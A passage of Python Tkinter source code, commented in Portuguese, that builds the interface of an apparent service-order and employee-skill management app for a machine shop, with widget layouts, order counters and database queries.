self.box21 = Spinbox(self.frameAtribuicao, from_=0, to=4, font=('arial',10), relief=GROOVE, border=2)
self.box22 = Spinbox(self.frameAtribuicao, from_=0, to=4, font=('arial',10), relief=GROOVE, border=2)
self.box23 = Spinbox(self.frameAtribuicao, from_=0, to=4, font=('arial',10), relief=GROOVE, border=2)
self.box24 = Spinbox(self.frameAtribuicao, from_=0, to=4, font=('arial',10), relief=GROOVE, border=2)
self.box25 = Spinbox(self.frameAtribuicao, from_=0, to=4, font=('arial',10), relief=GROOVE, border=2)
self.box26 = Spinbox(self.frameAtribuicao, from_=0, to=4, font=('arial',10), relief=GROOVE, border=2)
self.box27 = Spinbox(self.frameAtribuicao, from_=0, to=4, font=('arial',10), relief=GROOVE, border=2)
self.box28 = Spinbox(self.frameAtribuicao, from_=0, to=4, font=('arial',10), relief=GROOVE, border=2)
self.box29 = Spinbox(self.frameAtribuicao, from_=0, to=4, font=('arial',10), relief=GROOVE, border=2)
self.box30 = Spinbox(self.frameAtribuicao, from_=0, to=4, font=('arial',10), relief=GROOVE, border=2)
self.box31 = Spinbox(self.frameAtribuicao, from_=0, to=4, font=('arial',10), relief=GROOVE, border=2)
self.box32 = Spinbox(self.frameAtribuicao, from_=0, to=4, font=('arial',10), relief=GROOVE, border=2)
self.box33 = Spinbox(self.frameAtribuicao, from_=0, to=4, font=('arial',10), relief=GROOVE, border=2)
self.box34 = Spinbox(self.frameAtribuicao, from_=0, to=4, font=('arial',10), relief=GROOVE, border=2)
self.box35 = Spinbox(self.frameAtribuicao, from_=0, to=4, font=('arial',10), relief=GROOVE, border=2)
self.box36 = Spinbox(self.frameAtribuicao, from_=0, to=4, font=('arial',10), relief=GROOVE, border=2)
self.box37 = Spinbox(self.frameAtribuicao, from_=0, to=4, font=('arial',10), relief=GROOVE, border=2)
self.box38 = Spinbox(self.frameAtribuicao, from_=0, to=4, font=('arial',10), relief=GROOVE, border=2)
self.box39 = Spinbox(self.frameAtribuicao, from_=0, to=4, font=('arial',10), relief=GROOVE, border=2)
self.box40 = Spinbox(self.frameAtribuicao, from_=0, to=4, font=('arial',10), relief=GROOVE, border=2)
self.box41 = Spinbox(self.frameAtribuicao, from_=0, to=4, font=('arial',10), relief=GROOVE, border=2)
self.box1.place(relx=0.190, rely=0.130, relwidth=0.06)
self.box2.place(relx=0.430, rely=0.130, relwidth=0.06)
self.box3.place(relx=0.680, rely=0.130, relwidth=0.06)
self.box4.place(relx=0.930, rely=0.130, relwidth=0.06)
self.box5.place(relx=0.190, rely=0.210, relwidth=0.06)
self.box6.place(relx=0.430, rely=0.210, relwidth=0.06)
self.box7.place(relx=0.680, rely=0.210, relwidth=0.06)
self.box8.place(relx=0.930, rely=0.210, relwidth=0.06)
self.box9.place(relx=0.190, rely=0.290, relwidth=0.06)
self.box10.place(relx=0.430, rely=0.290, relwidth=0.06)
self.box11.place(relx=0.680, rely=0.290, relwidth=0.06)
self.box12.place(relx=0.930, rely=0.290, relwidth=0.06)
self.box13.place(relx=0.190, rely=0.370, relwidth=0.06)
self.box14.place(relx=0.430, rely=0.370, relwidth=0.06)
self.box15.place(relx=0.680, rely=0.370, relwidth=0.06)
self.box16.place(relx=0.930, rely=0.370, relwidth=0.06)
self.box17.place(relx=0.190, rely=0.450, relwidth=0.06)
self.box18.place(relx=0.430, rely=0.450, relwidth=0.06)
self.box19.place(relx=0.680, rely=0.450, relwidth=0.06)
self.box20.place(relx=0.930, rely=0.450, relwidth=0.06)
self.box21.place(relx=0.190, rely=0.530, relwidth=0.06)
self.box22.place(relx=0.430, rely=0.530, relwidth=0.06)
self.box23.place(relx=0.680, rely=0.530, relwidth=0.06)
self.box24.place(relx=0.930, rely=0.530, relwidth=0.06)
self.box25.place(relx=0.190, rely=0.610, relwidth=0.06)
self.box26.place(relx=0.430, rely=0.610, relwidth=0.06)
self.box27.place(relx=0.680, rely=0.610, relwidth=0.06)
self.box28.place(relx=0.930, rely=0.610, relwidth=0.06)
self.box29.place(relx=0.190, rely=0.690, relwidth=0.06)
self.box30.place(relx=0.430, rely=0.690, relwidth=0.06)
self.box31.place(relx=0.680, rely=0.690, relwidth=0.06)
self.box32.place(relx=0.930, rely=0.690, relwidth=0.06)
self.box33.place(relx=0.190, rely=0.770, relwidth=0.06)
self.box34.place(relx=0.430, rely=0.770, relwidth=0.06)
self.box35.place(relx=0.680, rely=0.770, relwidth=0.06)
self.box36.place(relx=0.930, rely=0.770, relwidth=0.06)
self.box37.place(relx=0.190, rely=0.850, relwidth=0.06)
self.box38.place(relx=0.430, rely=0.850, relwidth=0.06)
self.box39.place(relx=0.680, rely=0.850, relwidth=0.06)
self.box40.place(relx=0.930, rely=0.850, relwidth=0.06)
self.box41.place(relx=0.190, rely=0.930, relwidth=0.06)
#Botão que confirmará os dados quando solicitado
self.imgConfirmar = PhotoImage(file='image/confirmar.png')
self.botaoConfirmar = Button(self.aba3, image=self.imgConfirmar, border=0, bg='white', activebackground='white', command=lambda:self.verificar_campos_cadastro('cadastrar'))
self.botaoConfirmar.place(relx=0.82, rely=0.90)
def aba_ordem_de_servico(self):
global img
img = PhotoImage(file='image/nova.png')
botAltribuirOS = Button(self.framePri, text='Novo O.S', image=img, compound=TOP, font=('arial', 9), bg='white', fg='black', relief=SOLID, border=0, command=self.criar_ordem_de_servico)
botAltribuirOS.place(relx=0.070, rely=0.040)
global img2
img2 = PhotoImage(file='image/alterar2.png')
botEditarOS = Button(self.framePri, text='Editar', image=img2, compound=TOP, font=('arial', 9), bg='white', fg='black', relief=SOLID, border=0)
botEditarOS.place(relx=0.160, rely=0.040)
global img3
img3 = PhotoImage(file='image/ferramenta.png')
botAlterarOS = Button(self.framePri, text='Cad. Peça', image=img3, compound=TOP, font=('arial', 9), bg='white', fg='black', relief=SOLID, border=0, command=self.janela_exibir_pecas)
botAlterarOS.place(relx=0.230, rely=0.040)
self.frameBuscar = Frame(self.framePri, highlightbackground='#e6e6e6', highlightcolor='#e6e6e6', highlightthickness=2, bg='white')
self.frameBuscar.place(relx=0.060, rely=0.190, relwidth=0.880, relheight=0.180)
#Label e Combobox para escolher qual tipo de pesquisa será feita
labelPesquisar = Label(self.frameBuscar, text='Buscar por', font=('arial', 10), bg='white', fg='#344f84')
labelPesquisar.place(relx=0.060, rely=0.250)
self.boxPesquisar = ttk.Combobox(self.frameBuscar, font=('arial',10), state='readonly')
self.boxPesquisar['values'] = ('O.S', 'Cliente')
self.boxPesquisar.place(relx=0.130, rely=0.250, relwidth=0.070)
self.boxPesquisar.current(0)
#Barra de busca e botão para pesquisar
self.strCampoBusca = StringVar()
self.strCampoBusca.trace('w', self.buscar)
self.campoBusca = Entry(self.frameBuscar, font=('arial', 12), border=2, relief=GROOVE)
self.campoBusca.place(relx=0.050, rely=0.505, relwidth=0.140)
self.campoBusca.bind("<Return>", self.buscar)
self.campoBusca.focus_force()
self.imgLupa = PhotoImage(file="image/lupa.png")
botBuscar = Button(self.frameBuscar, image=self.imgLupa, bg='white', border=0, activebackground='white')
botBuscar.place(relx=0.190, rely=0.502)
#Filtrar campo de tempo
labelDateDe = Label(self.frameBuscar, text='Data de', font=('arial', 10), bg='white', fg='#344f84')
labelDateDe.place(relx=0.460, rely=0.250)
dia = Entry(self.frameBuscar, font=('arial',10), width=3, border=2, relief=GROOVE)
dia.place(relx=0.470, rely=0.505)
barra = Label(self.frameBuscar, text='/', font=('arial',10), bg='white', fg='#344f84')
barra.place(relx=0.497, rely=0.505)
mes = Entry(self.frameBuscar, font=('arial',10), width=3, border=2, relief=GROOVE)
mes.place(relx=0.510, rely=0.505)
barra = Label(self.frameBuscar, text='/', font=('arial',10), bg='white', fg='#344f84')
barra.place(relx=0.537, rely=0.505)
ano = Entry(self.frameBuscar, font=('arial',10), width=5, border=2, relief=GROOVE)
ano.place(relx=0.547, rely=0.505)
labelDateDe = Label(self.frameBuscar, text='Até', font=('arial', 10), bg='white', fg='#344f84')
labelDateDe.place(relx=0.660, rely=0.250)
dia2 = Entry(self.frameBuscar, font=('arial',10), width=3, border=2, relief=GROOVE)
dia2.place(relx=0.670, rely=0.505)
barra = Label(self.frameBuscar, text='/', font=('arial',10), bg='white', fg='#344f84')
barra.place(relx=0.697, rely=0.505)
mes2 = Entry(self.frameBuscar, font=('arial',10), width=3, border=2, relief=GROOVE)
mes2.place(relx=0.710, rely=0.505)
barra = Label(self.frameBuscar, text='/', font=('arial',10), bg='white', fg='#344f84')
barra.place(relx=0.737, rely=0.505)
ano2 = Entry(self.frameBuscar, font=('arial',10), width=5, border=2, relief=GROOVE)
ano2.place(relx=0.747, rely=0.505)
#Frame onde ficará contagens de Retrabalhos do dia
self.frameTotUrgente = Frame(self.framePri, highlightbackground='white', highlightthickness=2, bg='white')
self.frameTotUrgente.place(relx=0.550, rely=0.020, relwidth=0.120, relheight=0.150)
labelTitle1 = Label(self.frameTotUrgente, text='Urgente', bg='white', fg='red', font=('arial', 13, 'bold'))
labelTitle1.place(relx=0.5, rely=0.150, relheight=0.210, anchor='center')
lbOSUrgente = Label(self.frameTotUrgente, bg='white', fg='red', font=('arial', 25, 'bold'))
lbOSUrgente.place(relx=0.5, rely=0.5, anchor="center")
labelHoje = Label(self.frameTotUrgente, text='Total', bg='white', fg='red', font=('arial', 10, 'bold'))
labelHoje.place(relx=0.5, rely=0.800, anchor='center')
#Criando balão de mensagem
balao_info = tix.Balloon(self.aba4, bg='#e6f9ff')
balao_info.bind_widget(self.frameTotUrgente, balloonmsg='Número de O.S aberta com urgência.')
#Configurando cores de fundo do balão
balao_info.subwidgets_all()[1].config(bg='#e6f9ff')
balao_info.subwidgets_all()[2].config(bg='#e6f9ff')
balao_info.subwidgets_all()[3].config(bg='#e6f9ff')
balao_info.subwidgets_all()[4].config(bg='#e6f9ff')
#Removendo seta padrão do balão de mensagem
balao_info.subwidget('label')['image'] = BitmapImage()
self.dataHoje = datetime.now().date()
try:
self.cursor.execute("select count(*) from ordem_servico where TipoOS = 'Urgente' and Estado = 'Aberto'")
lbOSUrgente['text'] = self.cursor.fetchall()[0][0]
except:
pass
#Frame onde ficará contagens de Operações do dia
self.frameTotAtrasada = Frame(self.framePri, highlightbackground='white', highlightthickness=2, bg='white')
self.frameTotAtrasada.place(relx=0.700, rely=0.020, relwidth=0.120, relheight=0.150)
labelTitle1 = Label(self.frameTotAtrasada, text='Atrasadas', bg='white', fg='yellow', font=('arial', 13, 'bold'))
labelTitle1.place(relx=0.5, rely=0.150, relheight=0.210, anchor='center')
lbOSAtrada = Label(self.frameTotAtrasada, bg='white', fg='yellow', font=('arial', 25, 'bold'))
lbOSAtrada.place(relx=0.5, rely=0.5, anchor="center")
labelHoje = Label(self.frameTotAtrasada, text='Total', bg='white', fg='yellow', font=('arial', 10, 'bold'))
labelHoje.place(relx=0.5, rely=0.800, anchor='center')
#Criando balão de mensagem
balao_info = tix.Balloon(self.aba4, bg='#e6f9ff')
balao_info.bind_widget(self.frameTotAtrasada, balloonmsg='Número de O.S aberta com atrasos.')
#Configurando cores de fundo do balão
balao_info.subwidgets_all()[1].config(bg='#e6f9ff')
balao_info.subwidgets_all()[2].config(bg='#e6f9ff')
balao_info.subwidgets_all()[3].config(bg='#e6f9ff')
balao_info.subwidgets_all()[4].config(bg='#e6f9ff')
#Removendo seta padrão do balão de mensagem
balao_info.subwidget('label')['image'] = BitmapImage()
try:
self.cursor.execute("select count(*) from ordem_servico where DataPrevista < '"+str(self.dataHoje)+"' and Estado = 'Aberto'")
lbOSAtrada['text'] = self.cursor.fetchall()[0][0]
except Exception as erro:
print(f'{erro}, {(erro.__class__)}')
#Frame onde ficará contagens de OS
self.frameTotPrazo = Frame(self.framePri, highlightbackground='white', highlightthickness=2, bg='white')
self.frameTotPrazo.place(relx=0.840, rely=0.020, relwidth=0.120, relheight=0.150)
labelTitle1 = Label(self.frameTotPrazo, text='No Prazo', bg='white', fg='#32cd32', font=('arial', 13, 'bold'))
labelTitle1.place(relx=0.5, rely=0.150, relheight=0.210, anchor='center')
lbOSPrazo = Label(self.frameTotPrazo, bg='white', fg='#32cd32', font=('arial', 25, 'bold'))
lbOSPrazo.place(relx=0.5, rely=0.5, anchor="center")
labelTotal = Label(self.frameTotPrazo, text='Total', bg='white', fg='#32cd32', font=('arial', 10, 'bold'))
labelTotal.place(relx=0.5, rely=0.800, anchor='center')
#Criando balão de mensagem
balao_info = tix.Balloon(self.aba4, bg='#e6f9ff')
balao_info.bind_widget(self.frameTotPrazo, balloonmsg='Número de O.S aberta dentro da data estipulada.')
#Configurando cores de fundo do balão
balao_info.subwidgets_all()[1].config(bg='#e6f9ff')
balao_info.subwidgets_all()[2].config(bg='#e6f9ff')
balao_info.subwidgets_all()[3].config(bg='#e6f9ff')
balao_info.subwidgets_all()[4].config(bg='#e6f9ff')
#Removendo seta padrão do balão de mensagem
balao_info.subwidget('label')['image'] = BitmapImage()
try:
#Consultando no banco de dados as O.S Pausada de modo distintas
self.cursor.execute("select count(*) from ordem_servico where DataPrevista >= '"+str(self.dataHoje)+"' and Estado = 'Aberto'")
lbOSPrazo['text'] = self.cursor.fetchall()[0][0]
except: pass
labelTitle1 = Label(self.framePri, text='Ordem de Serviço', bg='white', fg='grey', font=('arial', 13))
labelTitle1.place(relx=0.060, rely=0.403)
#Frame onde ficará os resultado das buscas feitas ao Banco de Dados
self.frameDados = Frame(self.framePri, highlightbackground='#e6e6e6', highlightcolor='white', highlightthickness=1, bg='white')
self.frameDados.place(relx=0.060, rely=0.450, relwidth=0.880, relheight=0.530)
#Posiçãao estática para classificação das colunas
self.sinal = 0
#Tree view onde exibirá as Ordem de Serviços
self.OrdemServico = ttk.Treeview(self.frameDados, column=('1','2','3','4','5','6','7','8'), show='headings')
'''
self.OrdemServico.heading('1', text='ID')
self.OrdemServico.heading('2', text='Ordem de Serviço')
self.OrdemServico.heading('3', text='Data de Abertura')
self.OrdemServico.heading('4', text='Nº de Peça')
self.OrdemServico.heading('5', text='Operações Realizada')
self.OrdemServico.heading('6', text='Retrabalhos')
self.OrdemServico.heading('7', text='Total de Horas')
'''
self.OrdemServico.heading('1', text='ID')
self.OrdemServico.heading('2', text='OS')
self.OrdemServico.heading('3', text='Cliente')
self.OrdemServico.heading('4', text='Produto')
self.OrdemServico.heading('5', text='QTDE')
self.OrdemServico.heading('6', text='Tipo/OS')
self.OrdemServico.heading('7', text='Data Prevista')
self.OrdemServico.heading('8', text='Situação')
self.OrdemServico.column("1", width=1, anchor='n')
self.OrdemServico.column("2", width=100, anchor='n')
self.OrdemServico.column("3", width=200, anchor='n')
self.OrdemServico.column("4", width=200, anchor='n')
self.OrdemServico.column("5", width=50, anchor='n')
self.OrdemServico.column("6", width=100, anchor='n')
self.OrdemServico.column("7", width=100, anchor='n')
self.OrdemServico.column("8", width=100, anchor='n')
self.OrdemServico.place(relx=0, rely=0, relwidth=0.975, relheight=0.999)
self.OrdemServico.bind("<Double-1>", self.exibir_toplevel_inicio)
self.OrdemServico.bind("<Return>", self.exibir_toplevel_inicio)
self.OrdemServico.bind("<Escape>", lambda event: self.remover_focus(event, self.OrdemServico))
scrollbar = Scrollbar(self.frameDados, orient="vertical", command=self.OrdemServico.yview)
self.OrdemServico.configure(yscrollcommand=scrollbar.set)
scrollbar.place(relx=0.975, rely=0, relwidth=0.025, relheight=0.999)
self.cursor.execute("select a.id, a.OS, a.Cliente, a.Produto, a.QTDE, a.TipoOS, a.DataPrevista, a.Estado from ordem_servico as a")
osBuscada = self.cursor.fetchall()
for os in osBuscada:
self.OrdemServico.insert("", "end", values=(os[0], os[1], os[2], os[3], os[4], os[5], os[6], os[7]))
'''
try:
#Consultando no banco de dados as O.S finalizadas de modo distintas
self.cursor.execute("select OS, id, DataAberta, Peca from ordem_processo group by OS order by id asc")
osDistintas = self.cursor.fetchall()
#Para cada linha de O.S selecionada, irá armazenar as colunas nas segintes variáveis
for os in osDistintas:
self.cursor.execute("select id, DataInicial from concluidas where OS ="+str(os[0])+" limit 1")
linha = self.cursor.fetchall()
self.cursor.execute("select count(*) from concluidas where OS ="+str(os[0]))
contagemOperacoes = self.cursor.fetchall()
self.cursor.execute("select count(*) from concluidas where Tipo = 'Retrabalhar OS' and OS = "+str(os[0]))
contagemRetrabalho = self.cursor.fetchall()
self.cursor.execute("select count(Peca) from ordem_processo where OS = '"+str(os[0])+"' and Peca = '"+str(os[3])+"' group by Peca order by id asc")
nPecas = self.cursor.fetchall()
#extraindo do banco de dados as informações e armazenando nas variáveis
ID = os[1]
if osDistintas == []:
dataAberta = 'Não Disponível'
nPecas = 'Não Disponível'
else:
dataAberta = os[2].strftime('%d/%m/%Y às %H:%M:%S')
#Consulta SQL a ser feita por parametro
SQL = ("select TempGasto, TempGastoExt from concluidas where OS = "+str(os[0]))
horaTotal = self.somar_total_horas_gastas_os(SQL, 2)
#Adicionando as colunas da respectiva O.S na Treeview
self.OrdemServico.insert("", "end", values=(ID, os[0], dataAberta, nPecas, contagemOperacoes, contagemRetrabalho, horaTotal))
except Exception as erro:
print(f'{erro}, {(erro.__class__)}')
'''
def exibir_habilidade(self):
self.janelaHabilidade = Toplevel()
self.centraliza_tela(900, 500, self.janelaHabilidade)
selecionada = self.viewFuncionarios.selection()[0]
x = self.viewFuncionarios.item(selecionada, "values")
idd = x[0]
frame = Frame(self.janelaHabilidade, highlightbackground='#e6e6e6', highlightcolor='#e6e6e6', highlightthickness=1, bg='white')
frame.place(relx=0.050, rely=0.200, relwidth=0.900, relheight=0.650)
linhaCabecario = Label(frame, bg='black', fg='white', text='Niveis Funcionário', font=('arial',12,'bold'))
linhaCabecario.place(relx=0, rely=0, relwidth=1, relheight=0.080)
lbHabilidade1 = Label(frame, text='Desenhar', font=('arial', 10, 'bold'), bg='white', fg='black')
lbHabilidade2 = Label(frame, text='Revisar', font=('arial', 10, 'bold'), bg='white', fg='black')
lbHabilidade3 = Label(frame, text='Serrar', font=('arial', 10, 'bold'), bg='white', fg='black')
lbHabilidade4 = Label(frame, text='Furar', font=('arial', 10, 'bold'), bg='white', fg='black')
lbHabilidade5 = Label(frame, text='Estampar', font=('arial', 10, 'bold'), bg='white', fg='black')
lbHabilidade6 = Label(frame, text='Prensar', font=('arial', 10, 'bold'), bg='white', fg='black')
lbHabilidade7 = Label(frame, text='Rosquear', font=('arial', 10, 'bold'), bg='white', fg='black')
lbHabilidade8 = Label(frame, text='Tornear 1º', font=('arial', 10, 'bold'), bg='white', fg='black')
lbHabilidade9 = Label(frame, text='Tornear 2º', font=('arial', 10, 'bold'), bg='white', fg='black')
lbHabilidade10 = Label(frame, text='Tornear Única', font=('arial', 10, 'bold'), bg='white', fg='black')
lbHabilidade11 = Label(frame, text='Fresar', font=('arial', 10, 'bold'), bg='white', fg='black')
lbHabilidade12 = Label(frame, text='Retificar', font=('arial', 10, 'bold'), bg='white', fg='black')
lbHabilidade13 = Label(frame, text='Erosão Penetração', font=('arial', 10, 'bold'), bg='white', fg='black')
lbHabilidade14 = Label(frame, text='Erosão Fio', font=('arial', 10, 'bold'), bg='white', fg='black')
lbHabilidade15 = Label(frame, text='Tratamento Térmico', font=('arial', 10, 'bold'), bg='white', fg='black')
lbHabilidade16 = Label(frame, text='Oxidação Negra', font=('arial', 10, 'bold'), bg='white', fg='black')
lbHabilidade17 = Label(frame, text='Solda', font=('arial', 10, 'bold'), bg='white', fg='black')
lbHabilidade18 = Label(frame, text='Tornear Ponto', font=('arial', 10, 'bold'), bg='white', fg='black')
lbHabilidade19 = Label(frame, text='Solda Indução', font=('arial', 10, 'bold'), bg='white', fg='black')
lbHabilidade20 = Label(frame, text='Lixar', font=('arial', 10, 'bold'), bg='white', fg='black')
lbHabilidade21 = Label(frame, text='Esmerilhar', font=('arial', 10, 'bold'), bg='white', fg='black')
lbHabilidade22 = Label(frame, text='Jatear', font=('arial', 10, 'bold'), bg='white', fg='black')
lbHabilidade23 = Label(frame, text='Polir', font=('arial', 10, 'bold'), bg='white', fg='black')
lbHabilidade24 = Label(frame, text='Lavar', font=('arial', 10, 'bold'), bg='white', fg='black')
lbHabilidade25 = Label(frame, text='Embalar', font=('arial', 10, 'bold'), bg='white', fg='black')
lbHabilidade26 = Label(frame, text='Medir', font=('arial', 10, 'bold'), bg='white', fg='black')
lbHabilidade27 = Label(frame, text='Rebarbar', font=('arial', 10, 'bold'), bg='white', fg='black')
lbHabilidade28 = Label(frame, text='Rosquear Manualmente', font=('arial', 10, 'bold'), bg='white', fg='black')
lbHabilidade29 = Label(frame, text='Pintar', font=('arial', 10, 'bold'), bg='white', fg='black')
lbHabilidade30 = Label(frame, text='Montar', font=('arial', 10, 'bold'), bg='white', fg='black')
lbHabilidade31 = Label(frame, text='Escarear', font=('arial', 10, 'bold'), bg='white', fg='black')
lbHabilidade32 = Label(frame, text='Afiar Ferramenta', font=('arial', 10, 'bold'), bg='white', fg='black')
lbHabilidade33 = Label(frame, text='Dobrar', font=('arial', 10, 'bold'), bg='white', fg='black')
lbHabilidade34 = Label(frame, text='Chanfrar', font=('arial', 10, 'bold'), bg='white', fg='black')
lbHabilidade35 = Label(frame, text='Soldar', font=('arial', 10, 'bold'), bg='white', fg='black')
lbHabilidade36 = Label(frame, text='Cortar c/lixadeira', font=('arial', 10, 'bold'), bg='white', fg='black')
lbHabilidade37 = Label(frame, text='Cortar c/maçarico', font=('arial', 10, 'bold'), bg='white', fg='black')
lbHabilidade38 = Label(frame, text='Aquecer com Maçarico', font=('arial', 10, 'bold'), bg='white', fg='black')
lbHabilidade39 = Label(frame, text='Temperar', font=('arial', 10, 'bold'), bg='white', fg='black')
lbHabilidade40 = Label(frame, text='Revenir', font=('arial', 10, 'bold'), bg='white', fg='black')
lbHabilidade41 = Label(frame, text='Desempenar', font=('arial', 10, 'bold'), bg='white', fg='black')
lbHabilidade1.place(relx=0.020, rely=0.130, relwidth=0.180)
lbHabilidade2.place(relx=0.260, rely=0.130, relwidth=0.180)
lbHabilidade3.place(relx=0.510, rely=0.130, relwidth=0.180)
lbHabilidade4.place(relx=0.760, rely=0.130, relwidth=0.180)
lbHabilidade5.place(relx=0.020, rely=0.210, relwidth=0.180)
lbHabilidade6.place(relx=0.260, rely=0.210, relwidth=0.180)
lbHabilidade7.place(relx=0.510, rely=0.210, relwidth=0.180)
lbHabilidade8.place(relx=0.760, rely=0.210, relwidth=0.180)
lbHabilidade9.place(relx=0.020, rely=0.290, relwidth=0.180)
lbHabilidade10.place(relx=0.260, rely=0.290, relwidth=0.180)
lbHabilidade11.place(relx=0.510, rely=0.290, relwidth=0.180)
lbHabilidade12.place(relx=0.760, rely=0.290, relwidth=0.180)
lbHabilidade13.place(relx=0.020, rely=0.370, relwidth=0.180)
lbHabilidade14.place(relx=0.260, rely=0.370, relwidth=0.180)
lbHabilidade15.place(relx=0.510, rely=0.370, relwidth=0.180)
lbHabilidade16.place(relx=0.760, rely=0.370, relwidth=0.180)
lbHabilidade17.place(relx=0.020, rely=0.450, relwidth=0.180)
lbHabilidade18.place(relx=0.260, rely=0.450, relwidth=0.180)
lbHabilidade19.place(relx=0.510, rely=0.450, relwidth=0.180)
lbHabilidade20.place(relx=0.760, rely=0.450, relwidth=0.180)
lbHabilidade21.place(relx=0.020, rely=0.530, relwidth=0.180)
lbHabilidade22.place(relx=0.260, rely=0.530, relwidth=0.180)
lbHabilidade23.place(relx=0.510, rely=0.530, relwidth=0.180)
lbHabilidade24.place(relx=0.760, rely=0.530, relwidth=0.180)
lbHabilidade25.place(relx=0.020, rely=0.610, relwidth=0.180)
lbHabilidade26.place(relx=0.260, rely=0.610, relwidth=0.180)
lbHabilidade27.place(relx=0.510, rely=0.610, relwidth=0.180)
lbHabilidade28.place(relx=0.760, rely=0.610, relwidth=0.180)
lbHabilidade29.place(relx=0.020, rely=0.690, relwidth=0.180)
lbHabilidade30.place(relx=0.260, rely=0.690, relwidth=0.180)
lbHabilidade31.place(relx=0.510, rely=0.690, relwidth=0.180)
lbHabilidade32.place(relx=0.760, rely=0.690, relwidth=0.180)
lbHabilidade33.place(relx=0.020, rely=0.770, relwidth=0.180)
lbHabilidade34.place(relx=0.260, rely=0.770, relwidth=0.180)
lbHabilidade35.place(relx=0.510, rely=0.770, relwidth=0.180)
lbHabilidade36.place(relx=0.760, rely=0.770, relwidth=0.180)
lbHabilidade37.place(relx=0.020, rely=0.850, relwidth=0.180)
lbHabilidade38.place(relx=0.260, rely=0.850, relwidth=0.180)
lbHabilidade39.place(relx=0.510, rely=0.850, relwidth=0.180)
lbHabilidade40.place(relx=0.760, rely=0.850, relwidth=0.180)
lbHabilidade41.place(relx=0.020, rely=0.930, relwidth=0.180)
lbDados1 = Label(frame, font=('arial', 10, 'bold'), bg='white', fg='black')
lbDados2 = Label(frame, font=('arial', 10, 'bold'), bg='white', fg='black')
lbDados3 = Label(frame, font=('arial', 10, 'bold'), bg='white', fg='black')
lbDados4 = Label(frame, font=('arial', 10, 'bold'), bg='white', fg='black')
lbDados5 = Label(frame, font=('arial', 10, 'bold'), bg='white', fg='black')
lbDados6 = Label(frame, font=('arial', 10, 'bold'), bg='white', fg='black')
lbDados7 = Label(frame, font=('arial', 10, 'bold'), bg='white', fg='black')
lbDados8 = Label(frame, font=('arial', 10, 'bold'), bg='white', fg='black')
lbDados9 = Label(frame, font=('arial', 10, 'bold'), bg='white', fg='black')
lbDados10 = Label(frame, font=('arial', 10, 'bold'), bg='white', fg='black')
lbDados11 = Label(frame, font=('arial', 10, 'bold'), bg='white', fg='black')
lbDados12 = Label(frame, font=('arial', 10, 'bold'), bg='white', fg='black')
lbDados13 = Label(frame, font=('arial', 10, 'bold'), bg='white', fg='black')
lbDados14 = Label(frame, font=('arial', 10, 'bold'), bg='white', fg='black')
lbDados15 = Label(frame, font=('arial', 10, 'bold'), bg='white', fg='black')
lbDados16 = Label(frame, font=('arial', 10, 'bold'), bg='white', fg='black')
lbDados17 = Label(frame, font=('arial', 10, 'bold'), bg='white', fg='black')
lbDados18 = Label(frame, font=('arial', 10, 'bold'), bg='white', fg='black')
lbDados19 = Label(frame, font=('arial', 10, 'bold'), bg='white', fg='black')
lbDados20 = Label(frame, font=('arial', 10, 'bold'), bg='white', fg='black')
lbDados21 = Label(frame, font=('arial', 10, 'bold'), bg='white', fg='black')
lbDados22 = Label(frame, font=('arial', 10, 'bold'), bg='white', fg='black')
lbDados23 = Label(frame, font=('arial', 10, 'bold'), bg='white', fg='black')
lbDados24 = Label(frame, font=('arial', 10, 'bold'), bg='white', fg='black')
lbDados25 = Label(frame, font=('arial', 10, 'bold'), bg='white', fg='black')
lbDados26 = Label(frame, font=('arial', 10, 'bold'), bg='white', fg='black')
lbDados27 = Label(frame, font=('arial', 10, 'bold'), bg='white', fg='black')
lbDados28 = Label(frame, font=('arial', 10, 'bold'), bg='white', fg='black')
lbDados29 = Label(frame, font=('arial', 10, 'bold'), bg='white', fg='black')
lbDados30 = Label(frame, font=('arial', 10, 'bold'), bg='white', fg='black')
lbDados31 = Label(frame, font=('arial', 10, 'bold'), bg='white', fg='black')
lbDados32 = Label(frame, font=('arial', 10, 'bold'), bg='white', fg='black')
lbDados33 = Label(frame, font=('arial', 10, 'bold'), bg='white', fg='black')
lbDados34 = Label(frame, font=('arial', 10, 'bold'), bg='white', fg='black')
lbDados35 = Label(frame, font=('arial', 10, 'bold'), bg='white', fg='black')
lbDados36 = Label(frame, font=('arial', 10, 'bold'), bg='white', fg='black')
lbDados37 = Label(frame, font=('arial', 10, 'bold'), bg='white', fg='black')
lbDados38 = Label(frame, font=('arial', 10, 'bold'), bg='white', fg='black')
lbDados39 = Label(frame, font=('arial', 10, 'bold'), bg='white', fg='black')
lbDados40 = Label(frame, font=('arial', 10, 'bold'), bg='white', fg='black')
lbDados41 = Label(frame, font=('arial', 10, 'bold'), bg='white', fg='black')
lbDados1.place(relx=0.205, rely=0.130, relwidth=0.02)
lbDados2.place(relx=0.445, rely=0.130, relwidth=0.02)
lbDados3.place(relx=0.695, rely=0.130, relwidth=0.02)
lbDados4.place(relx=0.945, rely=0.130, relwidth=0.02)
lbDados5.place(relx=0.205, rely=0.210, relwidth=0.02)
lbDados6.place(relx=0.445, rely=0.210, relwidth=0.02)
lbDados7.place(relx=0.695, rely=0.210, relwidth=0.02)
lbDados8.place(relx=0.945, rely=0.210, relwidth=0.02)
lbDados9.place(relx=0.205, rely=0.290, relwidth=0.02)
lbDados10.place(relx=0.445, rely=0.290, relwidth=0.02)
lbDados11.place(relx=0.695, rely=0.290, relwidth=0.02)
lbDados12.place(relx=0.945, rely=0.290, relwidth=0.02)
lbDados13.place(relx=0.205, rely=0.370, relwidth=0.02)
lbDados14.place(relx=0.445, rely=0.370, relwidth=0.02)
lbDados15.place(relx=0.695, rely=0.370, relwidth=0.02)
lbDados16.place(relx=0.945, rely=0.370, relwidth=0.02)
lbDados17.place(relx=0.205, rely=0.450, relwidth=0.02)
lbDados18.place(relx=0.445, rely=0.450, relwidth=0.02)
lbDados19.place(relx=0.695, rely=0.450, relwidth=0.02)
lbDados20.place(relx=0.945, rely=0.450, relwidth=0.02)
lbDados21.place(relx=0.205, rely=0.530, relwidth=0.02)
lbDados22.place(relx=0.445, rely=0.530, relwidth=0.02)
lbDados23.place(relx=0.695, rely=0.530, relwidth=0.02)
lbDados24.place(relx=0.945, rely=0.530, relwidth=0.02)
lbDados25.place(relx=0.205, rely=0.610, relwidth=0.02)
lbDados26.place(relx=0.445, rely=0.610, relwidth=0.02)
lbDados27.place(relx=0.695, rely=0.610, relwidth=0.02)
lbDados28.place(relx=0.945, rely=0.610, relwidth=0.02)
lbDados29.place(relx=0.205, rely=0.690, relwidth=0.02)
lbDados30.place(relx=0.445, rely=0.690, relwidth=0.02)
